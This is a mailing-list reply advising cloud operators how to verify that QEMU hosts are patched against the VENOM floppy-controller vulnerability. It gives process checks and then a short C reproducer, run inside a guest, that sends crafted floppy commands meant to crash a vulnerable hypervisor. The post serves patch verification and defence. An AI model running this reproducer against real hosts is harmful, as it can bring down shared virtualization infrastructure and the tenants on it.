On 06/04/2015 08:50 AM, Fox, Kevin M wrote: > I'm not aware of any check that actually tests the vulnerability. Just checks > package versions.
Hi, On the compute host you can check the process age using "ps aux". The START column for every qemu-system-* process should be more recent than the date you updated. At least, any process older than May 13th still has the bug. Also, using PID, you can make sure /proc/$pid/exe is pointing to the new binary and not a "(deleted)" one. Within a guest, the condition of exploitation may vary from system to system. A reproducer has been published here: http://seclists.org/oss-sec/2015/q2/448 Though it requires fast timing, here is an updated version to prod the other vulnerable floppy command: cat>venom.c<<EOF #include <sys/io.h> int main() { int i; iopl(3); for (i=0;i<10000000;i++) outsb(0x3f5,"\x8e\x00\x00\x00\x00\x00",6); } EOF gcc -O2 venom.c && sudo ./a.out This should crash an ubuntu-14.04 instance if qemu is still vulnerable. However it's not 100% guaranteed and you better make sure qemu-kvm is up-to-date and no old qemu instance are running. Regards, Tristan
signature.asc
Description: OpenPGP digital signature
_______________________________________________ OpenStack-operators mailing list OpenStack-operators@lists.openstack.org http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-operators
